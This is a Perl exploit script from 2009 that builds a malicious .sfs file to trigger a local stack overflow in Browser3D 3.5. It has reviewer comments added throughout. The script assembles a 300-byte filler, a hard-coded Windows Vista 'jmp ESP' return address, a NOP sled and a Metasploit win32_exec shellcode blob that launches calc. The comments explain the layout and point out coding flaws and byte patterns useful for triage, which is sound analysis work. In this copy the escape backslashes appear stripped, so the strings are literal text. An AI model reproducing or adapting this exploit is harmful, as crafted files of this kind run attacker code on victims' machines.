# Title : Browser3D 3.5 (.sfs File) Local Stack Overflow Exploit
# Published : 2009-01-22
# Author : AlpHaNiX
#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# THanks
# File-generator stage: takes one argument (the output filename); the
# statements further down build a buffer and append it to that file.
# NOTE(review): this listing appears to have lost its backslashes in
# extraction ("n" where "\n" is expected, "x41" where "\x41" is expected), so
# as printed the strings below are literal text, not newlines or raw bytes.
# Cosmetic: invokes the console `color` command; presumably Windows-only, and
# the return value is ignored.
system("color 5");
# Exactly one argument is required. `&help;` calls the sub with the caller's
# current @_ and bypasses its () prototype; exit() with no argument exits
# with status 0, so a usage error is indistinguishable from success.
if (@ARGV != 1) { &help; exit(); }
# Prints the one-line usage string to STDOUT.
sub help(){
print "[X] Usage : ./exploit.pl filename n";
}
# The output path is copied verbatim from the command line into the package
# global $file (no `my`; the listing has no `use strict`). It is not
# validated before being used in open() later in the script.
{ $file = $ARGV[0]; }
# Banner output only; no effect on the generated file.
print "n [X]*************************************************n";
print " [X]Browser3D(.sfs file) Local Stack Overflow Exploit*n";
print " [X] Coded By AlpHaNiX *n";
print " [X] From Null Area [NullArea.Net] *n";
print " [X]**************************************************nn";
print "[+] Exploiting.....n" ;
# Filler placed first in the buffer. As printed this is the 3-character
# string "x41" repeated 300 times; presumably the original was "\x41"
# (300 bytes of 0x41) -- confirm against an undamaged copy.
my $acc="x41" x 300 ;
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Payload blob. The generator comment preceding this statement labels it as a
# Metasploit win32_exec payload with CMD=calc and Size=160; the ten rows of
# sixteen "xNN" groups here are consistent with that size. It is an encoded
# blob (Encoder=PexFnstenvSub per that comment), so its bytes are not
# readable as plain instructions.
# NOTE(review): the "xNN" groups have presumably lost a leading backslash in
# extraction; as printed they are literal text, not bytes.
my $shellcode =
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x5d".
"x7exf1x8cx83xebxfcxe2xf4xa1x96xb5x8cx5dx7ex7axc9".
"x61xf5x8dx89x25x7fx1ex07x12x66x7axd3x7dx7fx1axc5".
"xd6x4ax7ax8dxb3x4fx31x15xf1xfax31xf8x5axbfx3bx81".
"x5cxbcx1ax78x66x2axd5x88x28x9bx7axd3x79x7fx1axea".
"xd6x72xbax07x02x62xf0x67xd6x62x7ax8dxb6xf7xadxa8".
"x59xbdxc0x4cx39xf5xb1xbcxd8xbex89x80xd6x3exfdx07".
"x2dx62x5cx07x35x76x1ax85xd6xfex41x8cx5dx7ex7axe4".
"x61x21xc0x7ax3dx28x78x74xdexbex8axdcx35x8ex7bx88".
"x02x16x69x72xd7x70xa6x73xbax1dx90xe0x3ex7exf1x8c";
# Four-value field placed directly after the filler. The author's comment
# describes it as the address of a `jmp ESP` on Windows Vista, i.e. a
# hard-coded, OS-build-specific constant. Presumably this is what lands on the
# saved return address when the target parses the file -- the listing does not
# show the vulnerable parser, so confirm. A fixed address like this is the
# assumption that ASLR is designed to break.
my $ret ="x1ax0fx46x77" ; # jmp ESP in Windows VISTA
# Twenty-element padding run between the address field and the payload.
my $nop ="x90" x 20 ;# some lame nops lol
# Final layout, in order: filler, address field, padding run, payload.
# For triage of a suspect .sfs file this ordering is the recognisable shape:
# a long single-value run, a 4-byte field, a short 0x90 run, then an encoded
# blob.
my $exploit = $acc.$ret.$nop.$shellcode;
print "[+] Creating Evil File" ;
# Two-argument open with the mode and the unvalidated $file joined in one
# string, so characters in the filename can influence how it is opened.
# ">>" is append mode: running the script twice against the same name adds a
# second copy after the first instead of replacing it. $FILE is a package
# global, and the die message omits $! so the OS error is not reported.
open($FILE, ">>$file") or die "Cannot open $file";
# No binmode is set and the results of print/close are not checked, so a
# short or failed write would go unnoticed.
print $FILE $exploit;
close($FILE);
# Status lines only; the file has already been written and closed by the time
# "Please wait" is printed.
print "n[+] Please wait while creating $file";
print "n[+] $file has been created";